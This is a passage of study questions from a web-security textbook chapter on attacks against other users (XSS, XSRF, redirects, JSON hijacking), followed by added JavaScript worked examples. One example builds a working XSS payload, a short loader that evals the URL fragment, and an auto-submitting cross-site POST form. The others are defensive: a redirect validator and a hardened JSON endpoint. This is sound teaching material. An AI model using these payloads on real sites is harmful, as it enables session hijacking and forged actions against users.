The Web Application Hacker’s Handbook: Discovering and Exploiting Security Flaws


Chapter 12  ■ Attacking Other Users





6. How does the browser’s same origin policy impinge upon the use of the Ajax technology XMLHttpRequest?

7. Name three possible attack payloads for XSS exploits (that is, the malicious actions that you can perform within another user’s browser, not the methods by which you deliver the attacks).

8. You discover a function which copies the value of some user-supplied data into the target of an image tag:

The data is stored within the application and will be returned to other authenticated users who view the relevant page. The application is HTML-encoding the < and > characters, preventing you from breaking out of the image tag. What two categories of attack can you perform?

9. You have discovered a reflected XSS vulnerability where you can inject arbitrary data into a single location within the HTML of the returned page. The data inserted is truncated to 50 bytes, but you want to inject a lengthy script. You prefer not to call out to a script on an external server. How can you work around the length limit?

10. You discover a reflected XSS flaw in a request that must use the POST method. What delivery mechanisms are feasible for performing an attack?

11. How can an attacker make use of the TRACE method to facilitate an XSS attack?

12. You discover an application function where the contents of a query string parameter are inserted into the Location header in an HTTP redirect. What three different types of attacks can this behavior potentially be exploited to perform?

13. Your very first request to a banking application returns HTML like the following:

What vulnerability can you immediately diagnose here, without performing any further testing?

14. What is the main precondition that must exist to enable an XSRF attack against a sensitive function of an application?

15. What three defensive measures can each be used to prevent JSON hijacking attacks?
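Worked example for questions 9 and 10 (an added example, not code from the book): delivering a reflected XSS payload when the injection point keeps only 50 bytes, and when the vulnerable request must be a POST. The host `bank.example`, the parameter `q` and the field names are invented for illustration; the "server" below is a model of the reflection, not a real application.

```javascript
// Added example (not the book's code). Target URL, parameter and field
// names are invented; reflectTruncated() models the vulnerable server.

const LIMIT = 50; // bytes the vulnerable application keeps from the parameter

// (Q9) A loader that fits under the limit. Everything after '#' in a URL is
// kept by the browser and never sent in the request, so the real script can
// ride in the fragment: it is neither truncated nor seen by server-side
// filters, and no external server is involved. The loader is 45 bytes.
const LOADER = '<script>eval(location.hash.slice(1))</script>';

// Model of the vulnerable server: reflect the parameter, keeping LIMIT bytes.
function reflectTruncated(value) {
  const bytes = new TextEncoder().encode(value).slice(0, LIMIT);
  return '<p>Results for: ' + new TextDecoder().decode(bytes) + '</p>';
}

// GET attack URL: the loader goes in the query string (subject to the limit),
// the lengthy script goes in the fragment (not subject to it).
function buildFragmentAttackUrl(base, param, longScript) {
  const u = new URL(base);
  u.searchParams.set(param, LOADER);
  u.hash = encodeURIComponent(longScript);
  return u.toString();
}

// What the server receives (no fragment) and what the victim's browser keeps.
function simulateVictimVisit(attackUrl, param) {
  const u = new URL(attackUrl);
  const html = reflectTruncated(u.searchParams.get(param)); // server side
  const fragment = decodeURIComponent(u.hash.slice(1));     // browser side only
  return { html, fragment, loaderIntact: html.includes(LOADER) };
}

// (Q10) When the vulnerable request must be a POST, a <script src> or a plain
// link cannot deliver it. The usual mechanism is a page on an attacker-controlled
// host containing a form aimed at the vulnerable URL that submits itself.
function attrEscape(s) {
  return String(s).replace(/&/g, '&amp;').replace(/"/g, '&quot;')
                  .replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

function buildAutoSubmitPage(action, fields) {
  // Values are entity-encoded so the attacker's own page stays well-formed;
  // the browser decodes them again before submitting, so the raw payload
  // (including '<' and '>') reaches the vulnerable parameter untouched.
  const inputs = Object.entries(fields).map(([name, value]) =>
    `<input type="hidden" name="${attrEscape(name)}" value="${attrEscape(value)}">`
  ).join('\n    ');
  return `<html><body onload="document.forms[0].submit()">
  <form method="POST" action="${attrEscape(action)}">
    ${inputs}
  </form>
</body></html>`;
}
```

The fragment trick only matters because the browser keeps `#...` local; it does not help against a limit enforced client-side on the whole URL, and it still needs the 45-byte loader to survive whatever encoding the reflection point applies. The auto-submitting form delivers the same POST the victim's own browser would send, cookies included, so it works wherever the application identifies the user purely by cookie.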
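Worked example for question 12 (an added example, not code from the book): a validator for a redirect target taken from a query string parameter, written so that each rejection corresponds to one of the attack classes that an attacker-controlled `Location` header invites. The host name `bank.example` is invented; the function returns a same-origin path rather than echoing the raw parameter.

```javascript
// Added example (not the book's code). ALLOWED_HOST is invented.

const ALLOWED_HOST = 'bank.example';

// Validate a redirect target before it is placed in a Location header.
// Returns { ok: true, location } or { ok: false, reason }.
function validateRedirect(target) {
  const raw = String(target);

  // 1. HTTP header injection. A CR or LF in the value terminates the Location
  //    header and lets the attacker append further headers (e.g. Set-Cookie)
  //    or a second, fully attacker-controlled response body. This check must
  //    run on the raw value: URL parsers silently strip tab, CR and LF, so a
  //    check made after parsing would miss the injected line break.
  if (/[\r\n]/.test(raw)) return { ok: false, reason: 'header-injection' };

  let u;
  try {
    // Resolve relative to the application's own origin so that '/account'
    // is accepted while '//evil.example/' and '\\evil.example' resolve to
    // a foreign host and are caught below.
    u = new URL(raw, 'https://' + ALLOWED_HOST + '/');
  } catch {
    return { ok: false, reason: 'unparseable' };
  }

  // 2. Script execution. A javascript: (or data:) URL in Location is followed
  //    by some clients and yields script running in the application's context.
  if (u.protocol !== 'https:') return { ok: false, reason: 'script-or-wrong-scheme' };

  // 3. Open redirect. Any other host turns the trusted domain into a phishing
  //    launch pad ("bank.example@evil.example" and "bank.example.evil.example"
  //    both land here because the parsed hostname is not the allowed one).
  if (u.hostname !== ALLOWED_HOST) return { ok: false, reason: 'open-redirect' };

  // Emit only the path, query and fragment, rebuilt from the parsed URL.
  return { ok: true, location: u.pathname + u.search + u.hash };
}
```

The order of the checks is the point: the CRLF test looks at the raw bytes, the scheme and host tests look at the parsed URL, and the value that reaches the header is reconstructed from the parser's output rather than copied from the parameter.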
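Worked example for questions 14 and 15 (an added example, not code from the book): a JSON endpoint that applies three independent measures against JSON hijacking, together with the matching client-side parse step. The request shape, the session store and the token value are constructed for the example; a real application would issue the token from a CSPRNG when the session is created. Requiring a token that is not carried in a cookie is also what removes the precondition for XSRF asked about in question 14: the application no longer identifies a request by cookies alone.

```javascript
// Added example (not the book's code). Request/session shapes and the token
// value are constructed for illustration.

// Measure 3: a prefix that makes the body a JavaScript syntax error, so a
// cross-site <script src="..."> that manages to fetch it cannot execute it.
const PREFIX = ")]}',\n";

// Compare tokens without leaking where they differ via timing.
function constantTimeEqual(a, b) {
  if (a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// req: { method, cookies: { session }, body: { csrf } }
// sessions: { [sessionId]: { csrfToken, data } }
function handleJsonRequest(req, sessions) {
  const session = sessions[req.cookies && req.cookies.session];
  if (!session) return { status: 401, body: '' };

  // Measure 1: POST only. A <script src> (the hijacking vector) issues a GET.
  if (req.method !== 'POST') return { status: 405, body: '' };

  // Measure 2: a per-session anti-CSRF token in the request body. The
  // attacker's page cannot read the token (same origin policy) and the
  // browser does not attach it automatically the way it attaches cookies.
  const supplied = (req.body && req.body.csrf) || '';
  if (!constantTimeEqual(supplied, session.csrfToken)) return { status: 403, body: '' };

  // Measure 3: unexecutable prefix, and an object rather than a bare array.
  return {
    status: 200,
    headers: { 'Content-Type': 'application/json', 'X-Content-Type-Options': 'nosniff' },
    body: PREFIX + JSON.stringify({ data: session.data }),
  };
}

// Client side (same origin, via XMLHttpRequest/fetch): strip the prefix, then parse.
function parseProtectedJson(body) {
  if (!body.startsWith(PREFIX)) throw new Error('missing anti-hijacking prefix');
  return JSON.parse(body.slice(PREFIX.length));
}
```

Each measure stands on its own: the prefix protects even a GET endpoint that forgot the token, and the token protects even a response that is plain JSON. The array-constructor and setter tricks behind classic JSON hijacking no longer work in current browsers, but the same three controls are what make the endpoint safe against plain XSRF, which is why they are still worth applying.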

